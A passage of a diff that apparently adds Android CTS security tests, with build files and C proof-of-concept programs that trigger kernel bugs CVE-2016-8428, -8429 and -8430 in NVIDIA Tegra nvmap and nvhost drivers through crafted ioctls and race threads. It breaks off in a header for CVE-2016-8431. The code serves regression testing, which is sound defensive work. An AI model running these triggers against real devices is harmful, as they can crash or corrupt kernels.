+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8428
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
new file mode 100644
index 0000000..b65b16c
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8428/poc.c
@@ -0,0 +1,213 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+struct nvmap_cache_op_list {
+ __u64 handles; /* Ptr to u32 type array, holding handles */
+ __u64 offsets; /* Ptr to u32 type array, holding offsets
+ * into handle mem */
+ __u64 sizes; /* Ptr to u32 type array, holindg sizes of memory
+ * regions within each handle */
+ __u32 nr; /* Number of handles */
+ __s32 op; /* wb/wb_inv/inv */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_RESERVE _IOW(NVMAP_IOC_MAGIC, 18, struct nvmap_cache_op_list)
+
+/* common carveout heaps */
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+enum {
+ NVMAP_PAGES_UNRESERVE = 0,
+ NVMAP_PAGES_RESERVE
+};
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_alloc_handle g_real_alloc = {0};
+struct nvmap_cache_op_list g_op_list = {0};
+#define MAX_HANDLE_NUM (1000)
+int g_handles_for_free[MAX_HANDLE_NUM] = {-1};
+int g_handles_for_alloc[MAX_HANDLE_NUM] = {-1};
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+int trigger_nvmap_create() {
+ g_allocation->handle = -1;
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+ printf("[*] NVMAP_IOC_CREATE, last error = %d\n", errno);
+ return g_allocation->handle;
+}
+
+void trigger_nvmap_alloc(int handle) {
+ g_real_alloc.handle = handle;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+ printf("[*] NVMAP_IOC_ALLOC, last error = %d\n", errno);
+}
+
+void trigger_nvmap_free(int handle) {
+ ioctl(g_fd, NVMAP_IOC_FREE, handle);
+ printf("[*] NVMAP_IOC_FREE last error = %d\n", errno);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+ printf("[*] setpriority(%d) errno = %d\n", privi, errno);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ printf("[*] sched_setaffinity(%ld) errno = %d\n", cpu_mask, errno);
+ }
+}
+
+void prepare_data() {
+ int i;
+ void* data = calloc(1, 0x1000);
+
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 0x40;
+
+ g_real_alloc.align = 0x40;
+ g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+
+ g_op_list.handles = (__u64)(&g_handles_for_alloc[0]);
+ g_op_list.offsets = (__u64)calloc(1, MAX_HANDLE_NUM * 4);
+ g_op_list.sizes = (__u64)malloc(MAX_HANDLE_NUM * 4);
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ ((int*)(g_op_list.sizes))[i] = 0xFFFF0000;
+ }
+ g_op_list.nr = MAX_HANDLE_NUM;
+ g_op_list.op = NVMAP_PAGES_RESERVE;
+}
+
+
+void create_handles() {
+ int i;
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ g_handles_for_alloc[i] = trigger_nvmap_create();
+ }
+
+}
+
+
+void trigger_rw_handle(int handle) {
+ ioctl(g_fd, NVMAP_IOC_RESERVE, &g_op_list);
+ printf("[*] NVMAP_IOC_RESERVE errno = %d\n", errno);
+}
+
+int main(int argc, char**argv) {
+ int i;
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+
+ prepare_data();
+ create_handles();
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ trigger_nvmap_alloc(g_handles_for_alloc[i]);
+ }
+
+ printf("[*] Begin to trigger bug....\n");
+ sleep(1);
+
+
+ for (i = 0; i < MAX_HANDLE_NUM; ++i) {
+ trigger_rw_handle(g_handles_for_alloc[i]);
+ }
+
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
new file mode 100644
index 0000000..bfe8718
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8429
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
new file mode 100644
index 0000000..293f617
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8429/poc.c
@@ -0,0 +1,176 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+#include <stdlib.h>
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+
+struct nvmap_handle_param {
+ __u32 handle; /* nvmap handle */
+ __u32 param; /* size/align/base/heap etc. */
+ unsigned long result; /* returns requested info*/
+};
+
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+
+#define NVMAP_IOC_MAGIC 'N'
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_PARAM _IOWR(NVMAP_IOC_MAGIC, 8, struct nvmap_handle_param)
+#define NVMAP_IOC_GET_ID _IOWR(NVMAP_IOC_MAGIC, 13, struct nvmap_create_handle)
+#define NVMAP_IOC_GET_FD _IOWR(NVMAP_IOC_MAGIC, 15, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+#define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_FROM_FD _IOWR(NVMAP_IOC_MAGIC, 16, struct nvmap_create_handle)
+int g_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+struct nvmap_create_handle* g_allocation = NULL;
+struct nvmap_create_handle g_allocation_dup;
+
+int open_driver() {
+ char* dev_path = "/dev/nvmap";
+ g_fd = open(dev_path, O_RDWR);
+ if (g_fd < 0) {
+ printf("[*] open file(%s) failed, errno=%d\n", dev_path, errno);
+ } else {
+ printf("[*] open file(%s) succ!\n", dev_path);
+ }
+ return g_fd;
+}
+
+void trigger_nvmap_create() {
+ ioctl(g_fd, NVMAP_IOC_CREATE, g_allocation);
+}
+
+void trigger_nvmap_create_dup(int fd) {
+ g_allocation_dup.fd = fd;
+ ioctl(g_fd, NVMAP_IOC_FROM_FD, &g_allocation_dup);
+}
+
+void trigger_nvmap_alloc() {
+ struct nvmap_alloc_handle alloc = {0};
+ alloc.align = 0x1000;
+ alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ alloc.handle = g_allocation->handle;
+ ioctl(g_fd, NVMAP_IOC_ALLOC, &alloc);
+}
+
+void trigger_nvmap_free(int fd) {
+ ioctl(g_fd, NVMAP_IOC_FREE, fd);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+
+void prepare_data() {
+ void* data = (void *) memalign(0x1000, 4 * 0x1000);
+ //void* data = malloc(0x10000);
+ printf("[*] data = %p\n", data);
+ g_allocation = (struct nvmap_create_handle*)data;
+ g_allocation->size = 1024;
+ g_allocation->handle = -1;
+ mprotect(data, 0x1000, PROT_READ);
+ printf("[*] mprotect, error = %d\n", errno);
+}
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-10, 2);
+
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+
+ while (1)
+ close(1024);
+}
+
+int main(int argc, char**argv) {
+
+ setup_privi_and_affinity(-10, 1);
+
+ if (open_driver() < 0) {
+ return -1;
+ }
+ prepare_data();
+
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ usleep(100 * 1000);
+
+ pthread_cond_signal(&cond);
+ usleep(20);
+ while (1) {
+ trigger_nvmap_create();
+ }
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk
new file mode 100644
index 0000000..839047b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8430/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8430
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
new file mode 100644
index 0000000..0717d0b
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8430/poc.c
@@ -0,0 +1,204 @@
+/*
+ * Copyright (C) 2016 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#define _GNU_SOURCE
+
+#include <errno.h>
+#include <unistd.h>
+#include <stdio.h>
+#include <dirent.h>
+#include <string.h>
+#include <sys/stat.h>
+#include <sys/ioctl.h>
+#include <stdio.h>
+#include <string.h>
+#include <dlfcn.h>
+#include <sys/time.h>
+#include <sys/mman.h>
+#include <sys/syscall.h>
+#include <sys/resource.h>
+#include <fcntl.h>
+#include <pthread.h>
+#include <unistd.h>
+#include <sched.h>
+#include <stdlib.h>
+
+struct nvhost_channel_open_args {
+ __s32 channel_fd;
+};
+struct nvhost_set_error_notifier {
+ __u64 offset;
+ __u64 size;
+ __u32 mem;
+ __u32 padding;
+};
+#define NVHOST_IOCTL_MAGIC 'H'
+#define NVHOST_IOCTL_CHANNEL_OPEN \
+ _IOR(NVHOST_IOCTL_MAGIC, 112, struct nvhost_channel_open_args)
+#define NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER \
+ _IOWR(NVHOST_IOCTL_MAGIC, 111, struct nvhost_set_error_notifier)
+struct nvmap_create_handle {
+ union {
+ __u32 id; /* FromId */
+ __u32 size; /* CreateHandle */
+ __s32 fd; /* DmaBufFd or FromFd */
+ };
+ __u32 handle; /* returns nvmap handle */
+};
+struct nvmap_alloc_handle {
+ __u32 handle; /* nvmap handle */
+ __u32 heap_mask; /* heaps to allocate from */
+ __u32 flags; /* wb/wc/uc/iwb etc. */
+ __u32 align; /* min alignment necessary */
+};
+#define NVMAP_HEAP_CARVEOUT_IRAM (1ul<<29)
+#define NVMAP_HEAP_CARVEOUT_VPR (1ul<<28)
+#define NVMAP_HEAP_CARVEOUT_TSEC (1ul<<27)
+#define NVMAP_HEAP_CARVEOUT_GENERIC (1ul<<0)
+
+#define NVMAP_HEAP_CARVEOUT_MASK (NVMAP_HEAP_IOVMM - 1)
+
+/* allocation flags */
+#define NVMAP_HANDLE_UNCACHEABLE (0x0ul << 0)
+#define NVMAP_HANDLE_WRITE_COMBINE (0x1ul << 0)
+#define NVMAP_HANDLE_INNER_CACHEABLE (0x2ul << 0)
+#define NVMAP_HANDLE_CACHEABLE (0x3ul << 0)
+#define NVMAP_HANDLE_CACHE_FLAG (0x3ul << 0)
+
+#define NVMAP_HANDLE_SECURE (0x1ul << 2)
+#define NVMAP_HANDLE_KIND_SPECIFIED (0x1ul << 3)
+#define NVMAP_HANDLE_COMPR_SPECIFIED (0x1ul << 4)
+#define NVMAP_HANDLE_ZEROED_PAGES (0x1ul << 5)
+#define NVMAP_HANDLE_PHYS_CONTIG (0x1ul << 6)
+#define NVMAP_HANDLE_CACHE_SYNC (0x1ul << 7)
+#define NVMAP_IOC_MAGIC 'N'
+
+/* Creates a new memory handle. On input, the argument is the size of the new
+ * handle; on return, the argument is the name of the new handle
+ */
+ #define NVMAP_IOC_ALLOC _IOW(NVMAP_IOC_MAGIC, 3, struct nvmap_alloc_handle)
+#define NVMAP_IOC_CREATE _IOWR(NVMAP_IOC_MAGIC, 0, struct nvmap_create_handle)
+#define NVMAP_IOC_FREE _IO(NVMAP_IOC_MAGIC, 4)
+int g_fd = -1;
+int g_nvmap_fd = -1;
+static pthread_cond_t cond = PTHREAD_COND_INITIALIZER;
+static pthread_mutex_t mutex = PTHREAD_MUTEX_INITIALIZER;
+int g_channel_fd = -1;
+struct nvhost_set_error_notifier g_error_notifier;
+struct nvmap_create_handle g_nvmap_hdl;
+
+struct nvmap_alloc_handle g_real_alloc = {0};
+
+int open_driver() {
+ char* dev_path = "/dev/nvhost-vic";
+ g_fd = open(dev_path, O_RDONLY);
+ if (g_fd < 0) {
+ printf("open file(%s) failed, errno=%d\n", dev_path, errno);
+ return -1;
+ } else {
+ printf("open file(%s) succ!\n", dev_path);
+ }
+
+ dev_path = "/dev/nvmap";
+ g_nvmap_fd = open(dev_path, O_RDONLY);
+ if (g_nvmap_fd < 0) {
+ printf("open file(%s) failed, errno=%d\n", dev_path, errno);
+ return -1;
+ } else {
+ printf("open file(%s) succ!\n", dev_path);
+ }
+ return 1;
+}
+
+void trigger_channel_open() {
+ struct nvhost_channel_open_args args = {-1};
+ ioctl(g_fd, NVHOST_IOCTL_CHANNEL_OPEN, &args);
+ g_channel_fd = args.channel_fd;
+}
+
+int trigger_nvmap_create() {
+ g_nvmap_hdl.size = 0x1000;
+ ioctl(g_nvmap_fd, NVMAP_IOC_CREATE, &g_nvmap_hdl);
+ return g_nvmap_hdl.handle;
+}
+
+void trigger_nvmap_free() {
+ int data = g_nvmap_hdl.handle;
+ ioctl(g_nvmap_fd, NVMAP_IOC_FREE, data);
+}
+void trigger_nvmap_alloc(int handle) {
+ g_real_alloc.align = 0x1000;
+ g_real_alloc.heap_mask = NVMAP_HEAP_CARVEOUT_GENERIC;
+ g_real_alloc.flags = NVMAP_HANDLE_ZEROED_PAGES;
+ g_real_alloc.handle = handle;
+ ioctl(g_nvmap_fd, NVMAP_IOC_ALLOC, &g_real_alloc);
+}
+void prepare_data() {
+ g_error_notifier.offset = 0;
+ g_error_notifier.mem = g_nvmap_hdl.handle;
+}
+
+void trigger_set_error_notifier() {
+ ioctl(g_fd, NVHOST_IOCTL_CHANNEL_SET_ERROR_NOTIFIER, &g_error_notifier);
+}
+
+void setup_privi_and_affinity(int privi, unsigned long cpu_mask) {
+ setpriority(PRIO_PROCESS, gettid(), privi);
+
+ /* bind process to a CPU*/
+ if (sched_setaffinity(gettid(), sizeof(cpu_mask), &cpu_mask) < 0) {
+ }
+}
+
+void* race_thread(void* arg) {
+ setup_privi_and_affinity(-19, 2);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ trigger_set_error_notifier();
+ }
+ return NULL;
+}
+
+void* race_thread_2(void* arg) {
+ setup_privi_and_affinity(-19, 1);
+ pthread_mutex_lock(&mutex);
+ pthread_cond_wait(&cond, &mutex);
+ pthread_mutex_unlock(&mutex);
+ while (1) {
+ trigger_set_error_notifier();
+ }
+ return NULL;
+}
+
+int main(int argc, char**argv) {
+ setup_privi_and_affinity(0, 1);
+ if (open_driver() < 0) {
+ return -1;
+ }
+ //trigger_nvmap_create();
+ trigger_nvmap_alloc(trigger_nvmap_create());
+ prepare_data();
+ //trigger_nvmap_free();
+ pthread_t tid;
+ pthread_create(&tid, NULL, race_thread, NULL);
+ pthread_create(&tid, NULL, race_thread_2, NULL);
+ usleep(100 * 1000);
+ pthread_cond_broadcast(&cond);
+
+ sleep(100);
+ return 0;
+}
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
new file mode 100644
index 0000000..d0ef823
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/Android.mk
@@ -0,0 +1,35 @@
+# Copyright (C) 2016 The Android Open Source Project
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+
+LOCAL_PATH := $(call my-dir)
+
+include $(CLEAR_VARS)
+LOCAL_MODULE := CVE-2016-8431
+LOCAL_SRC_FILES := poc.c
+LOCAL_MULTILIB := both
+LOCAL_MODULE_STEM_32 := $(LOCAL_MODULE)32
+LOCAL_MODULE_STEM_64 := $(LOCAL_MODULE)64
+
+# Tag this module as a cts test artifact
+LOCAL_COMPATIBILITY_SUITE := cts
+LOCAL_CTS_TEST_PACKAGE := android.security.cts
+
+LOCAL_ARM_MODE := arm
+CFLAGS += -Wall -W -g -O2 -Wimplicit -D_FORTIFY_SOURCE=2 -D__linux__ -Wdeclaration-after-statement
+CFLAGS += -Wformat=2 -Winit-self -Wnested-externs -Wpacked -Wshadow -Wswitch-enum -Wundef
+CFLAGS += -Wwrite-strings -Wno-format-nonliteral -Wstrict-prototypes -Wmissing-prototypes
+CFLAGS += -Iinclude -fPIE
+LOCAL_LDFLAGS += -fPIE -pie
+LDFLAGS += -rdynamic
+include $(BUILD_CTS_EXECUTABLE)
diff --git a/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
new file mode 100644
index 0000000..c74db80
--- /dev/null
+++ b/hostsidetests/security/securityPatch/CVE-2016-8431/local_poc.h
@@ -0,0 +1,245 @@
+/*
+ * Copyright (C) 2017 The Android Open Source Project
+ *
+ * Licensed under the Apache License, Version 2.0 (the "License");
+ * you may not use this file except in compliance with the License.
+ * You may obtain a copy of the License at
+ *
+ * http://www.apache.org/licenses/LICENSE-2.0
+ *
+ * Unless required by applicable law or agreed to in writing, software
+ * distributed under the License is distributed on an "AS IS" BASIS,
+ * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ * See the License for the specific language governing permissions and
+ * limitations under the License.
+ */
+#ifndef __LOCAL_POC_H__
+#define __LOCAL_POC_H__
+
+#define SIOCIWFIRSTPRIV 0x8BE0
+#define SIOCGIWNAME 0x8B01
+#define IOCTL_SET_STRUCT_FOR_EM (SIOCIWFIRSTPRIV + 11)
+#define PRIV_CUSTOM_BWCS_CMD 13
+#define PRIV_CMD_OID 15
+#define PRIV_CMD_SW_CTRL 20
+#define PRIV_CMD_WSC_PROBE_REQ 22
+
+enum host1x_class {
+ HOST1X_CLASS_HOST1X = 0x1,
+ HOST1X_CLASS_NVENC = 0x21,
+ HOST1X_CLASS_VI = 0x30,
+ HOST1X_CLASS_ISPA = 0x32,
+ HOST1X_CLASS_ISPB = 0x34,
+ HOST1X_CLASS_GR2D = 0x51,
+ HOST1X_CLASS_GR2D_SB = 0x52,
+ HOST1X_CLASS_VIC = 0x5D,
+ HOST1X_CLASS_GR3D = 0x60,
+ HOST1X_CLASS_NVJPG = 0xC0,
+ HOST1X_CLASS_NVDEC = 0xF0,
+};
+
+#define DRM_TEGRA_GEM_CREATE 0x00
